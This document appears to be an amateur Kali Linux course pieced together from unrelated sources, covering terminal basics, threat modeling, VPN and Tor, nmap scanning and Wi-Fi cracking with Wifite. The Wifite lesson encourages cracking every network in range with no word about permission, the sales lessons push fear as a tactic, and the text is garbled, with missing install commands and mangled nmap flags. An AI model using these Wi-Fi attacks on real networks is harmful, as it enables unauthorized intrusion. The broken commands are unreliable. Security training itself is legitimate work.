Académique Documents
Professionnel Documents
Culture Documents
Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It
is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon
Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux
distribution.
Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner),
Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for
penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security
scanners). Kali Linux can run natively when installed on a computers hard disk, can be booted from a
live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit
Projects Metasploit Framework, a tool for developing and executing security exploits.
Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution.
Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards.
All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our
VCS.
More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we
eliminated a great number of tools that either did not work or had other tools available that provided
similar functionality.
Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will
never, ever have to pay for Kali Linux.
Open source Git tree: We are huge proponents of open source software and our development tree is
available for all to see and all sources are available for those who wish to tweak and rebuild packages.
FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all
Linux users to easily locate binaries, support files, libraries, etc.
Vast wireless device support: We have built Kali Linux to support as many wireless devices as we
possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with
numerous USB and other wireless devices.
Custom kernel patched for injection: As penetration testers, the development team often needs to do
wireless assessments so our kernel has the latest injection patches included.
Secure development environment: The Kali Linux team is made up of a small group of trusted individuals
who can only commit packages and interact with the repositories while using multiple secure protocols.
GPG signed packages and repos: All Kali packages are signed by each individual developer when they
are built and committed and the repositories subsequently sign the packages as well.
Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has
true multilingual support, allowing more users to operate in their native language and locate the tools they
need for the job.
Completely customizable:
ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and
inexpensive, we knew that Kalis ARM support would need to be as robust as we could manage, resulting
in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories
integrated with the mainline distribution so tools for ARM will be updated in conjunction with the rest of
the distribution. Kali is currently available for the following ARM devices:
- rk3306 mk/ss808
- Raspberry Pi
- ODROID U2/X2
- Samsung Chromebook
- EfikaMX
- Beaglebone Black
- CuBox
..................
Okay class, its important to realize that most of the commands in kali are GUI or graphic user interface
unlike previous installations of backtrack which require terminal input.
Terminal is like windows command prompt, with a derivative you will be quick to notice, in file paths in
windows the slash is forwards
***Important***
Filepaths are case sensitive and when launching a program you also have to type the extension.
Ex. Root/user/admin/torhammer.py
If you had the above program installed, the extension being ".py" would launch the program.
Another cool thing about kali, and linux period, is if and when you learn a programming language, you
can code your own programs in their "notepad" style program and save it as something like
"hacklikeaboss.py" and it will save as a python file, then right click and change advanced settings to
executable file andddddd voila! Your very own custom program has been created.
Lesson 2 : Real World applications for kali, forming your own business, and introduction to terminal, the
hacker's best friend.
Lesson 2: Real World Applications for Kali Linux
Greetings class:
Real world applications for Kali Linux are very diverse. Incorperating them into your repertoire as a sales pitch
is crucial to forming a thriving business model that will generate revenue for you and your company.
Every 9 seconds a personal computer is hacked. Thousands of people either own their own business or work
from home. These are businesses that you will start with at first to build a reputation.
Stressing the importance of Data Security to the customer is an integral part of the sales pitch. Looking up
articles about local businesses around your area, and even college databases being breached can not only
raise awareness, but also raise the fear factor. Ever heard the term a little fear is healthy? Well fear sells, and
in todays day and age everyone is digital.
Some people run their business sites via wordpress, even blog on them daily about events. This consumes a
good portion of time for the client, and if someone were to access that because they had a faulty line of code in
their site, they could not only lose their investment, but lose customers and customer data as well.
A Kali Linux application for this would be a tool called wpscan, which we will review later on, but it scans the
site for vulnerabilities allowing you to report them to the sitemaster or admin.
Open ports are like open doors that anyone with the right knowledge can access, and access things like
customer data, and even credit card transaction information.
You will find when launching these programs via the drop down menu that they launch a sort of command
prompt via a program called terminal. Kali is already preconfigured to run root access, so a tutorial in sudo isnt
necessary.
Terminal accepts your commands and runs basically every function on kali and this is where you will spend
most of your time.
Everytime you start kali, if its a live disk and not a full install, i recommend opening up a terminal first thing
Then type
apt-get update
apt-get upgrade
Other commands are listed below
System Info
Keyboard Shortcuts
Ctrl + Z Stops the current command, resume with fg in the foreground or bg in the background
Ctrl + C Halts the current command, cancel the current operation and/or start with a fresh new line
Ctrl + L Clear the screen
command | less Allows the scrolling of the bash command window using Shift + Up Arrowand Shift +
Down Arrow
!! Repeats the last command
command !$ Repeats the last argument of the previous command
Esc + . (a period) Insert the last argument of the previous command on the fly, which enables you to edit it
before executing the command
File Permissions
chmod octal file Change the permissions of file to octal, which can be found separately for user, group,
and world by adding: 4 read (r),2 write (w), 1 execute (x)
Examples:
chmod 777 read, write, execute for all
chmod 755 rwx for owner, rx for group and world
For more options, see man chmod.
File Commands
ls Directory listing
ls -l List files in current directory using long format
ls -laC List all files in current directory in long format and display in columns
ls -F List files in current directory and indicate the file type
ls -al Formatted listing with hidden files
mv file /home/dirname Move the file called filename to the /home/dirname directory
mv file1 file2 Rename or move file1 to file2; if file2 is an existing directory, moves file1 into directory file2
Compression
Printing
Network
SSH
User Administration
adduser accountname Create a new user call accountname
passwd accountname Give accountname a new password
su Log in as superuser from current login
exit Stop being superuser and revert to normal user
Process Management
./configure
make
make install
dpkg -i pkg.deb install a DEB package (Debian / Ubuntu / Linux Mint)
rpm -Uvh pkg.rpm install a RPM package (Red Hat / Fedora)
I hope you have had time to experiment with terminal commands and familiarize yourelves with the file
structure of Kali Linux.
Fear sells, 100 percent of the time. It's this fear that drives us to protect ourselves against the unknown. It's this
fear that tells us money isn't a factor when it comes to protecting our investments. So, in short, today's lesson
will be on threat assessment.
Company xyz is a fortune 500 company, who buys and trades domains on the market, processing credit cars
and bank transactions, storing customer information on encrypted servers, and has an option for member sign
up. You ask them and they say they are running sql databases.
Modeling
There is no single solution for keeping yourself safe online. Digital security isnt about which tools you use;
rather, its about understanding the threats you face and how you can counter those threats. To become more
secure, you must determine what you need to protect, and whom you need to protect it from. Threats can
change depending on where youre located, what youre doing, and whom youre working with. Therefore, in
order to determine what solutions will be best for you, you should conduct a threat modeling assessment.
When conducting an assessment, there are five main questions you should ask yourself:
What do you want to protect?Who do you want to protect it from?How likely is it that you will need to protect
it?How bad are the consequences if you fail?How much trouble are you willing to go through in order to try to
prevent those?
When we talk about the first question, we often refer to assets, or the things that you are trying to protect.
An assett is something you value and want to protect. When we are talking about digital security, the assets in
question are usually information. For example, your emails, contact lists, instant messages, and files are all
assets. Your devices are also assets.
Write down a list of data that you keep, where its kept, who has access to it, and what stops others
from accessing it.
In order to answer the second question, Who do you want to protect it from, its important to understand who
might want to target you or your information, or who is your adversary. An adversary is any person or entity that
poses a threat against an asset or assets. Examples of potential adversaries are your boss, your government,
or a hacker on a public network.
Make a list of who might want to get ahold of your data or communications. It might be an individual, a
government agency, or a corporation.
A threat is something bad that can happen to an asset. There are numerous ways that an adversary can
threaten your data. For example, an adversary can read your private communications as they pass through the
network, or they can delete or corrupt your data. An adversary could also disable your access to your own data.
The motives of adversaries differ widely, as do their attacks. A government trying to prevent the spread of a
video showing police violence may be content to simply delete or reduce the availability of that video, whereas
a political opponent may wish to gain access to secret content and publish it without you knowing.
Write down what your adversary might want to do with your private data.
The capability of your attacker is also an important thing to think about. For example, your mobile phone
provider has access to all of your phone records and therefore has the capability to use that data against you.
A hacker on an open Wi-Fi network can access your unencrypted communications. Your government might
have stronger capabilities.
A final thing to consider is risk. Risk is the likelihood that a particular threat against a particular asset will
actually occur, and goes hand-in-hand with capability. While your mobile phone provider has the capability to
access all of your data, the risk of them posting your private data online to harm your reputation is low.
It is important to distinguish between threats and risks. While a threat is a bad thing that can happen, risk is the
likelihood that the threat will occur. For instance, there is a threat that your building might collapse, but the risk
of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where
they are not).
Conducting a risk analysis is both a personal and a subjective process; not everyone has the same priorities or
views threats in the same way. Many people find certain threats unacceptable no matter what the risk, because
the mere presence of the threat at any likelihood is not worth the cost. In other cases, people disregard high
risks because they don't view the threat as a problem.
In a military context, for example, it might be preferable for an asset to be destroyed than for it to fall into
enemy hands. Conversely, in many civilian contexts, it's more important for an asset such as email service to
be available than confidential.
If you want to keep your house and possessions safe, here are a few questions you might ask:
Should I lock my door?What kind of lock or locks should I invest in?Do I need a more advanced security
system?What are the assets in this scenario?The privacy of my homeThe items inside my homeWhat is the
threat?Someone could break in.What is the actual risk of someone breaking in? Is it likely?
Once you have asked yourself these questions, you are in a position to assess what measures to take. If your
possessions are valuable, but the risk of a break-in is low, then you probably wont want to invest too much
money in a lock. On the other hand, if the risk is high, youll want to get the best locks on the market, and
perhaps even add a security system.
Lesson 4: Opsec, VPN, Tor.
Opsec stands for "operational security" and is a term coined by the special forces in the United States military.
When it comes to hacking, Opsec is essential as to not let your opponent know that you are on to them. If you
are hired to test the security already in place, it would be obvious that you would need to learn ways to mask
your attacks.
What Is A VPN?
A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the
Internet) to a remote network/location. This remote network is typically a private network, such as a workplace
or home network, or one provided by a commercial VPN service.
A VPN can be thought to create a "tunnel" through the public network to your private network at the other end.
All network traffic through this tunnel is encrypted to ensure it is kept secure and private.
A VPN allows you to do a number of things you wouldn't otherwise be able to do connected to a standard
network. This includes:
Network Security & Privacy: All network traffic through your VPN connection is kept secure. This allows you
to use public networks (such as at hotels, conferences, coffee shops, etc.) and wireless networks knowing your
network traffic is kept safe and secure. Otherwise it is relatively easy for other people to view your network
traffic, such as see what you are viewing, steal your information and login details, etc.
Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you
were physically in the office. You can then do things like access file servers, computers, databases, email,
internal webpages, and other services you might not have access to outside of your work network.
Access Your Home Network: Connecting back home using a VPN allows you to access your computers
remotely. Access files on your computer, view iTunes shares, take remote control of your computer, and
access other services.
Access Location Restricted Content: By connecting to a VPN server in another location you can make it
appear to websites using geolocation that you are physically in the correct location for access. So when you're
travelling overseas you can still view websites you would normally use at home, such as television, movie and
music streaming websites.
Bypass Restrictive Networks: Some networks may restrict access to the web services that can be accessed,
meaning that many applications like VOIP, instant messenging, video chat, and games will not work. However
using a VPN you can tunnel through such restrictions and allow all of your network applications to work.
Viscosity even allows you to tunnel through a HTTP or SOCKS proxies to establish your VPN connection.
Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that
would otherwise be blocked. Some countries impose censorship on Internet access while in that country, and a
VPN provides a way to still maintain access to the services you would normally use.
Public networks, and in particular public wireless networks, provide an easy way for hackers and malicious
users to listen in ("sniff") on your network usage. This may allow them to see what web pages you are viewing,
steal username and passwords, steal session information to be able to log into sites as you, and extract other
private data. In addition, skilled hackers may perform a "man in the middle" attack. This allows them to not only
monitor in depth your network traffic, but also alter your traffic or inject their own in an attempt to fool a user into
revealing important data.
Using a VPN protects you from such attacks, as your network traffic is authenticated and encrypted, making it
secure and private.
A typical VPN consists of two components: the VPN client and the VPN server.
A VPN client is the software that allows a user to connect their computer to the VPN server and establish the
VPN connection. It is installed on the user's computer and communicates with the VPN server to create a
secure link for the user's network traffic. The VPN Client is what the end user uses to control their VPN
connection. Viscosity performs the duties of a VPN client.
A VPN server is setup at the location users want to connect to, such as at a workplace or at home. A VPN
Server usually configured and maintained by IT staff, however home users often set up their own VPN personal
VPN server at home or at a remote location as well. End users rarely have to interact with the VPN Server. A
VPN server will also perform authentication to ensure only registered users can connect to the VPN.
All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it
private and secure.
What Is OpenVPN?
OpenVPN is a popular VPN protocol that is based on SSL/TLS encryption. Like IPSec and PPTP, OpenVPN
handles the connection between the VPN client and server. OpenVPN is rapidly gaining in popularity thanks to
its high level of security, customizability, and compatibility with most network environments.
There are many companies that specialize in providing a commercial VPN service. These companies are
known as "VPN Service Providers". VPN Service Providers often have servers in multiple countries, allowing
you to not only get the security and privacy benefits on a VPN, but also making it easy to access websites that
restrict access to certain counties. Most VPN Service Providers charge a small monthly or yearly fee for access
to their servers, however there are also a number of free service providers.
TorGuard
TorGuard's claim to fame is that they offer specific types of servers for different activities. That gives you the
ability to connect to torrent-friendly services if you need to download something, encryption and anonymity-
friendly servers if you just need a little privacy and security, and so on. They're also one of the few VPN service
providers to take DNS leaking seriously, and they even offer their own test to make sure that your VPNeven
if you don't use themisn't leaking DNS and thus information you thought was secure. Depending on your
usage habits and patterns, TorGuard has different plans for you. For our purposes though, their full VPN
service will set you back $10/mo or $60/yr, and they have less expensive plans if you just want an anonymous
proxy or a torrent proxy. Their full VPN service however features over 200 exit servers in 18 countries, no
logging or data retention of any kind, and their network is set up in a way that they actually have no information
to collect on their user activitiesthey don't know what you're doing or when you're connected. They delivered
a really great response to Torrentfreak's questions that's well worth a read for more info. They also support
multiple connectivity protocols, support for virtually every desktop and mobile OS, and even offer their
customers encrypted, offshore email service if you want to take advantage.
Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN
servers to protect you against deep packet inspection (a technique used to capture and systematically decrypt
or inspect encrypted data, usually used by corporate networks, university networks, or specific "agencies.") You
also noted that they support OpenVPN, help you get connected via your home network, and have great
customer service.
IPVanish VPN
IPVanish takes an interesting approach to privacy and security. They use shared IP addresses, so when they
say no one has any idea what you're doing when you're connected, they mean it. That doesn't mean they're
compromising security thoughthey have over 14,0000 IPs to share on over a hundred exit servers in 47
different countries. You can choose where you'd prefer to connect, which again is perfect for getting around
location restrictions, and their encryption makes sure your traffic is safe from prying eyes. They support OS X,
Windows, and Ubuntu (although it wouldn't be too hard to stretch that to other distributions), along with iOS and
Android, and they offer configuration utilities so you can set you home router to connect to them as well. They
feature multiple connection protocols, don't discriminate against traffic types or port usage, don't monitor your
activities, and only log a few things. Torrentfreak gave them the nod as well. Accounts with IPVanish
are$10/mo or $78/yr, and you can connect two devices at once (as long as they're using different protocols.)
IPVanish earned high praise in the call for contenders thread for its speed while connected. How they manage
to do it is impressive, but the service manages to hold itself to a high standard of privacy and security while
giving you breakneck speeds that you may not be accustomed to with a VPN. The service proudly notes that
they're happy with you streaming video or music while you're connected to get around pesky content blocks,
especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back
home or make use of their streaming music subscription.
CyberGhost VPN
CyberGhost has been around for a long time, they made a great showing in the call for contenders thread. Like
any good, trustworthy VPN provider, they both encrypt all of the data that passes through your connection and
anonymize your location. They offer free and paid subscription plans, so if you just need a little security on the
go, you may be able to get away with a free account. The service just went through a massive overhaul about a
year ago, where they removed traffic and bandwidth restrictions for free accounts, and improved security from
the ground up. CyberGhost doesn't log any traffic, and they don't monitor what you're doing while you're
connected. They do retain some information, but not much. They offer your choice of exit servers in 23 different
countries (free users can pick from one of 14, still impressive for a free service), and you cansee server status
at any time
Their clients are easy to use, support virtually every mobile and desktop platforms, and they don't discriminate
against traffic types, protocols, or IP addresses (in fact, they just donated 10,000 licenses to users in Turkey to
get around their location-blocks.)
The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3
hours, and are limited to the official client, while pro accounts can use other connection protoctols and have
way more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account, but if
you need more than one device connected at any given time, you'll need to step up to Premium Plus, at
$11/mo and $70/yr. Those of you who praised the service noted their great connection speeds, wealth of
servers to choose from (even for free users). Read more in the nomination thread here.
Do-It-Yourself
Of course, no list of great options would be complete with the DIY approach. If you don't need exit servers in
different countries, and your primary need is to encrypt and secure your data when you're away from home,
you can roll yout own VPN with OpenVPN or a number of other free, open-source tools. Many of the best
routers on the market support OpenVPN out of the box, and even if they don't, the DD-WRT or Tomato
firmwares do, so if you can install those on your router, you'll be all set. The beauty of a home-rolled VPN is
that you get to set the level of encryption, you get complete control over who connects and who has access to
what parts of your home network, and where your data goes from there.
Of course, this setup is best for people traveling who want to encrypt their data while they're on the go, but with
a couple of friends, it's easy to set up a mesh network that would get you around content restrictions and port
blocks. Similarly, advanced users can fire up a VPN on their preferred host or VPS provider and keep their
VPN running there while they connect to it when necessary. The sky's the limit with the DIY option, it just takes
the skill and knowhow to do it, and some compromise on the level of features and tools you get.
We have more than a few honorable mentions this week, including one of my personal favorites, Hideman
VPN, for their cross-platform, mobile-friendly, no-logging VPN servicecomplete with free VPN options for
people just looking for a little security on the go without shelling out for a premium service. Also noteworthy are
the great people over at Tunnelbear, who are constantly working to improve and update their service to help
you get around regional restrictions and blocks-and recently unveiled a browser add-on to tunnel some
services but not others, giving you even more control over your connection.
We'll also give the nod to AirVPN, a popular pick that packs in way more features than you might possibly
need. You can forward remote ports, pick and choose exit services in multiple countries, and even generate an
OpenVPN config through their wizard to connect your home network to their service all the timeoh, and they
don't log, don't discriminate against protocols, and they have no idea when you're connected. If you're looking
to walk the line between a truly DIY option and a VPN that you roll at home, configure, and then connect to
externally, they're worth a look.
We should also highlight VyprVPN, which was a really tough call. VyprVPN is owned by the same company
that owns Giganews, the Usenet service provider. You can use VyprVPN as a stand-alone VPN client, but
you'll sign up for Giganews when you get it. They did very well in the call for contenders threadalthough
many of their votes were from first-time accountsand they certainly talk the talk on privacy issues. They
have multiple exit servers in multiple countries, strong encryption, and they're improving their service all the
time. However, they have a history of logging user data, sometimes a lot of user data, and at the very least log
user sessions and data for troubleshooting, acceptable use issues, and more for up to 90 days. That's not an
issue if you don't care about logging, but they were cagey with Torrentfreak back in 2011on the topic, cagey
with me when I last spoke to a rep from the company, andthis Reddit thread is rather illuminating as well. Still,
there are signs thatthings may be changing with VyprVPN. The feature set and the face of the company both
look good, and they combine Usenet with VPN services which is great, but we don't feel comfortable calling
them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of
your data.
A final notesomething we mentioned when we talked don't fall into the geography trap, assuming that an
overseas VPN or one outside your country is somehow safer or more committed to privacy than ones based in
your own or subject to your own laws. A local VPN that doesn't keep logs and has none to turn over is more
trustworthy than an overseas VPN that logs everything and is happy to turn your data over to anyone who
asksand there are definitely VPN providers that fall in both categories
Tor a privacy oriented encrypted anonymizing service, has announced the launch of its next version of Tor
Browser Bundle, i.e. Tor version 4.0.4, mostly supposed to improve the built-in utilities, privacy and security of
online users on the Internet.
Tor Browser helps users to browse the Internet in a complete anonymous way. The powerful Tor Browser
Bundle, an anonymous web browser developed by the Tor Project, received some updates in its software.
Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users
anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and
HTTPS-Everywhere.
NEW FEATURES
The latest version, Tor Browser Bundle 4.0.4, has been recently released, with a few number of new features:
Updated to Firefox to 31.5.0esr with important security updates.Update OpenSSL to 1.0.1lUpdate NoScript to
2.6.9.15Update HTTPS-Everywhere to 4.0.3
BUG FIXES
Meanwhile, the new Tor version 4.0.4 also include some bugfixes:Bug 14203: Prevent meek from displaying an
extra update notificationBug 14849: Remove new NoScript menu option to make permissions permanentBug
14851: Set NoScript pref to disable permanent permissions
"A new release for the stable Tor Browser is available from the Tor Browser Project page and also from
our distribution directory," states the Tor project team.
Tor is generally thought to be a place where users come online to hide their activities and remain anonymous.
Tor is an encrypted anonymizing network considered to be one of the most privacy oriented service and is
mostly used by activists, journalists to circumvent online censorship and surveillance efforts by various
countries.
However, late last year we have seen large scale cyber attack on Tor network that quietly seized some of its
network specialized servers called Directory Authorities (DA), the servers that help Tor clients to find Tor relays
in the anonymous network service.
On the other end of the side, last month 12 high-capacity Tor Middle relays was launched by the Polaris a
new initiative by Mozilla, the Tor Project and the Center of Democracy and Technology in order to help build
more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps
reduce finite number of Tor connections occurring at the same time.
Installing Tor in Kali Linux:
There are 3 ways of installing Tor service in Kali Linux. You can install Tor by following any of these options:
Tor is available in Kali repository, to install it directly from the repository open your Terminal and type this:
If you cant install Tor using the first method then you may try this option. In this way we are going to add the
official Tor repository according to our Debian distribution. Not to be confused, Kali is actually based on Debian
and it uses the package management from Wheezy. So we are going to use Wheezy as our distribution.
Now open your terminal and follow these steps:
Lets add the distribution in the list by opening the sources.list file
leafpad /etc/apt/sources.list
Now we need to add the gpg key used to sign the packages by running the following commands:
apt-get update
Now, before installing the Tor we must add the signing key,
Finally,
If you are an advanced user and you want to install Tor using the development branch then this method is for
you.
If you want to build your own debs from source you must first add an appropriate deb-srcline to sources.list.
You also need to install the necessary packages to build your own debs and the packages needed to build Tor:
mkdir ~/debian-packages; cd ~/debian-packages apt-get source tor cd tor-* debuild -rfakeroot -uc -us cd ..
dpkg -i tor_*.deb
cd tor-browser_LANG
./start-tor-browser
This will launch Vidalia and once that connects to Tor, it will launch Firefox.
Note: Do not unpack or run TBB as root. (though in Kali Linux, it doesnt make any differences)
Lesson 5: Introduction to NMap
Nmap is a very useful tool, especially for identifying open ports subject to attacks and infiltration, its GUI is user
friendly and boasts a wide variety of features.
Nmap (Network Mapper) is a free and open source utility for network exploration and security auditing. Many
systems and network administrators also find it useful for tasks such as network inventory, managing service
upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (application name and version) those hosts
are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls
are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine
against single hosts. Nmap runs on all major computer operating systems, and both console and graphical
versions are available.
This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. An
important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP
account cancellation or even civil and criminal charges. It also discusses the risks of crashing remote machines
as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL), and
copyright.
Sometimes the best way to understand something is to see it in action. This section includes examples of
Nmap used in (mostly) fictional yet typical circumstances. Nmap newbies should not expect to understand
everything at once. This is simply a broad overview of features that are described in depth in later chapters.
The solutions included throughout this book demonstrate many other common Nmap tasks for security
auditors and network administrators.
Avatar Online
Felix dutifully arrives at work on December 15th, although he does not expect many structured tasks. The small
San Francisco penetration-testing firm he works for has been quiet lately due to impending holidays. Felix
spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments
and war driving exploration. Nevertheless, Felix is hoping for more business. Hacking has been his hobby and
fascination since a childhood spent learning everything he could about networking, security, Unix, and phone
systems. Occasionally his curiosity took him too far, and Felix was almost swept up in the 1990 Operation
Sundevil prosecutions. Fortunately Felix emerged from adolescence without a criminal record, while retaining
his expert knowledge of security weaknesses. As a professional, he is able to perform the same types of
network intrusions as before, but with the added benefit of contractual immunity from prosecution and even a
paycheck! Rather than keeping his creative exploits secret, he can brag about them to client management
when presenting his reports. So Felix was not disappointed when his boss interrupted his antenna soldering to
announce that the sales department closed a pen-testing deal with the Avatar Online gaming company.
Avatar Online (AO) is a small company working to create the next generation of massive multi-player online
role-playing games (MMORPGs). Their product, inspired by the Metaverse envisioned in Neil
Stevenson's Snow Crash, is fascinating but still highly confidential. After witnessing the high-profile leak of
Valve Software's upcoming game source code, AO quickly hired the security consultants. Felix's task is to
initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical
security, source code auditing, social engineering, and so forth. Felix is permitted to exploit any vulnerabilities
found.
The first step in a vulnerability assessment is network discovery. This reconnaissance stage determines what
IP address ranges the target is using, what hosts are available, what services those hosts are offering, general
network topology details, and what firewall/filtering policies are in effect.
Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another
geographical registry) lookups, DNS queries and zone transfer attempts, various web sleuthing techniques, and
more. But in this case, Avatar Online explicitly specified what networks they want tested: the corporate network
on 6.209.24.0/24 and their production/DMZ systems residing on 6.207.0.0/22. Felix checks the IP whois
records anyway and confirms that these IP ranges are allocated to AO[1]. Felix subconsciously decodes the
CIDR notation[2] and recognizes this as 1,280 IP addresses. No problem.
Being the careful type, Felix first starts out with what is known as an Nmap list scan (-sL option). This feature
simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless -
n was specified) on each. One reason to do this first is stealth. The names of the hosts can hint at potential
vulnerabilities and allow for a better understanding of the target network, all without raising alarm bells[3]. Felix
is doing this for another reasonto double-check that the IP ranges are correct. The systems administrator
who provided the IPs might have made a mistake, and scanning the wrong company would be a disaster. The
contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks, but will
not help if Felix accidentally compromises another company's server! The command he uses and an excerpt of
the results are shown in Example 1.1
felix> nmap -sL 6.209.24.0/24 6.207.0.0/22 Starting Nmap ( http://nmap.org ) Nmap scan report for 6.209.24.0
Nmap scan report for 6.209.24.3 Nmap scan report for 6.209.24.4 ...
Nmap scan report for 6.207.0.5 Nmap scan report for 6.207.0.6
Nmap scan report for 6.207.0.8 ... Nmap scan report for cluster-c120.avataronline.com (6.207.2.120)
Reading over the results, Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online.
No other businesses seem to share the IP space. Moreover, these results give Felix a rough idea of how many
machines are in use and a good idea of what many are used for. He is now ready to get a bit more intrusive
and try a port scan. He uses Nmap features that try to determine the application and version number of each
service listening on the network. He also requests that Nmap try to guess the remote operating system via a
series of low-level TCP/IP probes known as OS fingerprinting. This sort of scan is not at all stealthy, but that
does not concern Felix. He is interested in whether the administrators of AO even notice these blatant scans.
After a bit of consideration, Felix settles on the following command:
nmap -sS -p- -PE -PP -PS80,443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan-
%D 6.209.24.0/24 6.207.0.0/22
Intro Nmap (Network Mapper) is an open source tool for network exploration and security auditing. It was
designed to rapidly scan large networks, although it works fine against single hosts. It uses raw IP packets in
novel ways to determine what hosts are available on the network, what services (application name and version)
those hosts are offering, what operating systems (and OS versions) they are running, what type
of packet filters/firewalls are in use, and dozens of other characteristics. While Network Mapper is
commonly used for security audits, many systems and network administrators find it useful for routine tasks
such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
A. GUI method
EX nmap 192.168.75.131
3. Boost up Your nmap Scan using this command u can decrease scan time
Ex nmap F google.com
Ex nmap 192.168.75.1/24
Ex nmap O 192.168.75.131
Ex nmap sT 192.168.75.131
Ex nmap sN 192.168.75.131
Ex nmap sF 192.168.75.131
Ex nmap sX 192.168.75.131
8. UDP Scan Scan a host for UDP services. This scan is used to view open UDP port.
Ex nmap sU 192.168.75.131
9. Scan for IP protocol This type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.)
are supported by target machines.
Ex nmap sO 192.168.75.131
10. detect remote services (server / daemon) version numbers
Ex nmap sV 192.168.75.131
11. Find out the most commonly used TCP ports using TCP SYN Scan
A. Stealthy scan
Ex nmap sS 192.168.75.131
B. Find out the most commonly used TCP ports using TCP connect scan
Ex nmap sT 192.168.75.131
C. Find out the most commonly used TCP ports using TCP ACK scan
Ex nmap sA 192.168.75.131
D. Find out the most commonly used TCP ports using TCP Window scan
Ex nmap sW 192.168.75.131
E. Find out the most commonly used TCP ports using TCP Maimon scan
Ex nmap sM 192.168.75.131
Ex nmap sL 192.168.75.131
13. Host Discovery or Ping Scan Scan a network and find out which servers and devices are up and running
Ex nmap sP 192.168.75.0/24
14. Scan a host when protected by the firewall
Ex nmap PN 192.168.75.1
Lesson 6: Wifi Hacking the easy way: Using WIFITE
Wifite
While the aircrack-ng suite is a well known name in the wireless hacking , the same can't be said about Wifite.
Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field
where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not
independent (eg. it hacks WPS using Reaver), it does what it promises, and puts hacking on autopilot. I'm
listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who
can understand simple English instructions given by Wifite can use it on his own).
Features Of Wifite
Sorts targets by signal strength (in dB); cracks closest access points first
Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks
are complete
Smart WPA de-authentication; cycles between all clients and broadcast deauths
Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
I find it worth mentioning here, that not only does it hack wifi the easy way, it also hack in the best possible
way.
For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP Method to
speed up data packets.
wifite -wep
The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when
you think it has scanned enough, you can tell it to stop by typing ctrl+c. It'll then ask you which wifi to hack. In
my case, I didn't specify -wep so it shows all the wifis in range.
You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be
hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets)
within 5 mins. Basically you can except it to hack the wifi in 10 mins approx. Notice how it automatically did the
fake auth and ARP replay.
Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something
that should bother you. You can stick with the simple wifite.
Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay,
the fragmentation attack was used, using -frag)
Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait.
However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you
saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many
other attacks can be played with. A good idea would be to execute the following-
wifite -help
This will tell you about the common usage commands, which will be very useful. Here is the list of WEP
commands for different attacks-
WEP
-wep only target WEP networks [off]
-pps <num> set the number of packets per second to inject [600]
-wept <sec> sec to wait for each attack, 0 implies endless [600]
-chopchop use chopchop attack [on]
-arpreplay use arpreplay attack [on]
-fragment use fragmentation attack [on]
-caffelatte use caffe-latte attack [on]
-p0841 use -p0841 attack [on]
-hirte use hirte (cfrag) attack [on]
-nofakeauth stop attack if fake authentication fails [off]
-wepca <n> start cracking when number of ivs surpass n [10000]
-wepsave save a copy of .cap files to this directory [off]
Troubleshooting
